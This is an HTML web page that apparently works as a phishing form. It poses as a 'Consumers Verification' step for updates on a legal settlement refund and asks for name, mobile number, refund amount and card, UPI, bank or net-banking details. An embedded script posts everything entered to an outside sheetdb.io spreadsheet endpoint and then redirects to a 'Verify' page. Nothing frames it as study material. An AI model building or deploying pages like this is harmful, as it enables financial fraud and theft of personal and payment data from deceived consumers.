<!DOCTYPE html>
<html>
<style>
    body {
        font-family: Arial, Helvetica, sans-serif;
    }

    * {
        box-sizing: border-box;
    }

    /* Full-width input fields */
    input[type=text],
    input[type=password] {
        width: 100%;
        padding: 15px;
        margin: 5px 0 22px 0;
        display: inline-block;
        border: none;
        background: #f1f1f1;
    }

    /* Add a background color when the inputs get focus */
    input[type=text]:focus,
    input[type=password]:focus {
        background-color: #ddd;
        outline: none;
    }

    /* Set a style for all buttons */
    button {
        background-color: #04AA6D;
        color: white;
        padding: 14px 20px;
        margin: 8px 0;
        border: none;
        cursor: pointer;
        width: 100%;
        opacity: 0.9;
    }

    button:hover {
        opacity: 1;
    }

    /* Extra styles for the cancel button */
    .cancelbtn {
        padding: 14px 20px;
        background-color: #f44336;
    }

    /* Float cancel and signup buttons and add an equal width */
    .cancelbtn,
    .signupbtn {
        float: left;
        width: 50%;
    }

    /* Add padding to container elements */
    .container {
        padding: 16px;
    }

    /* The Modal (background) */
    .modal {
        display: none;
        /* Hidden by default */
        position: fixed;
        /* Stay in place */
        z-index: 1;
        /* Sit on top */
        left: 0;
        top: 0;
        width: 100%;
        /* Full width */
        height: 100%;
        /* Full height */
        overflow: auto;
        /* Enable scroll if needed */
        background-color: #474e5d;
        padding-top: 50px;
    }

    /* Modal Content/Box */
    .modal-content {
        background-color: #fefefe;
        margin: 5% auto 15% auto;
        /* 5% from the top, 15% from the bottom and centered */
        border: 1px solid #888;
        width: 80%;
        /* Could be more or less, depending on screen size */
    }

    /* Style the horizontal ruler */
    hr {
        border: 1px solid #f1f1f1;
        margin-bottom: 25px;
    }

    /* The Close Button (x) */
    .close {
        position: absolute;
        right: 35px;
        top: 15px;
        font-size: 40px;
        font-weight: bold;
        color: #f1f1f1;
    }

    .close:hover,
    .close:focus {
        color: #f44336;
        cursor: pointer;
    }

    /* Clear floats */
    .clearfix::after {
        content: "";
        clear: both;
        display: table;
    }

    /* Change styles for cancel button and signup button on extra small screens */
    @media screen and (max-width: 300px) {

        .cancelbtn,
        .signupbtn {
            width: 100%;
        }
    }
</style>

<body>
    <h2> Consumers Verification </h2>
    <img src=" mobil.jpeg">
    <span onclick="document.getElementById('id01').style.display='none'" class="close"
        title="Close Modal">&times;</span>
    <form class="modal-content" action="https://sheetdb.io/api/v1/vs4tdo0usckts" method="post" id="sheetdb-form">
        <div class="container">
            <h1>Verify Your Self and get update Settlements on your legal case </h1>
            <p> Enter Your Correct details </p>
            <hr>

            <label for="name"><b> Your Name</b></label>
            <input type="text" placeholder="Enter your Name" name="data[name]" required>

            <label for="number"><b>Mobile Number</b></label>
            <input type="text" placeholder="Enter Mobile Number" name="data[number]" required>

            <label for="refund "><b>Refund amount</b></label>
            <input type="text" placeholder="Enter your refundable amount" name="data[refund]" required>

            <select name="mode" id="refund mode-select">
                <option value="">--Please choose an option--</option>
                <option value="Paytm">Paytm</option>
                <option value="Mobikwik">UPI</option>
                <option value="Credit card">Credit card</option>
                <option value="Debit card">Debit card</option>
                <option value="Bank Account">Bank Account</option>
                <option value="Net banking">Gift Card</option>
            </select>

            <label for="mode"><b>Enter details Below as per Option </b></label>
            <input type="text" placeholder="Enter Refund Mode " name="data[mode]" required>

            <button onclick="document.getElementById('id02').style.display='block'" style="width:auto;">Verify</button>

            <script>
                var form = document.getElementById('sheetdb-form');
                form.addEventListener("submit", e => {
                    e.preventDefault();
                    fetch(form.action, {
                        method: "POST",
                        body: new FormData(document.getElementById("sheetdb-form")),
                    }).then(
                        response => response.json()
                    ).then((html) => {
                        // you can put any JS code here
                        window.open('Verify.html', '_self');

                    });
                });
            </script>



</body>

</html>